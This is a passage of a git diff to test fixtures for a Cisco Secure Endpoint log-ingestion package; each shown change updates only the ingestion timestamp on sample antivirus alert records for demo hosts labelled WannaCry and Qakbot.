found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3748,7 +3748,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461750200Z", + "ingested": "2021-12-14T14:40:57.457060257Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3824,7 +3824,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461773300Z", + "ingested": "2021-12-14T14:40:57.457060603Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3900,7 +3900,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461779700Z", + "ingested": "2021-12-14T14:40:57.457060964Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -3999,7 +3999,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461784300Z", + "ingested": "2021-12-14T14:40:57.457061418Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -4089,7 +4089,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461808700Z", + "ingested": "2021-12-14T14:40:57.457061761Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -4163,7 +4163,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461814700Z", + "ingested": "2021-12-14T14:40:57.457062237Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", @@ -4235,7 +4235,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461820300Z", + "ingested": "2021-12-14T14:40:57.457062654Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -4311,7 +4311,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461824200Z", + "ingested": "2021-12-14T14:40:57.457063015Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index b22bbab8b1f..1114a09fe7f 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -28,7 +28,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388856300Z", + "ingested": "2021-12-14T14:41:01.444853387Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388859800Z", + "ingested": "2021-12-14T14:41:01.444856124Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -202,7 +202,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388865700Z", + "ingested": "2021-12-14T14:41:01.444856629Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -292,7 +292,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388870400Z", + "ingested": "2021-12-14T14:41:01.444857035Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -382,7 +382,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388875300Z", + "ingested": "2021-12-14T14:41:01.444858102Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -456,7 +456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388881100Z", + "ingested": "2021-12-14T14:41:01.444858620Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -528,7 +528,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388886800Z", + "ingested": "2021-12-14T14:41:01.444859097Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260880", "kind": "alert", @@ -604,7 +604,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388892500Z", + "ingested": "2021-12-14T14:41:01.444859715Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648143", "kind": "alert", @@ -692,7 +692,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.388898200Z", + "ingested": "2021-12-14T14:41:01.444860267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat 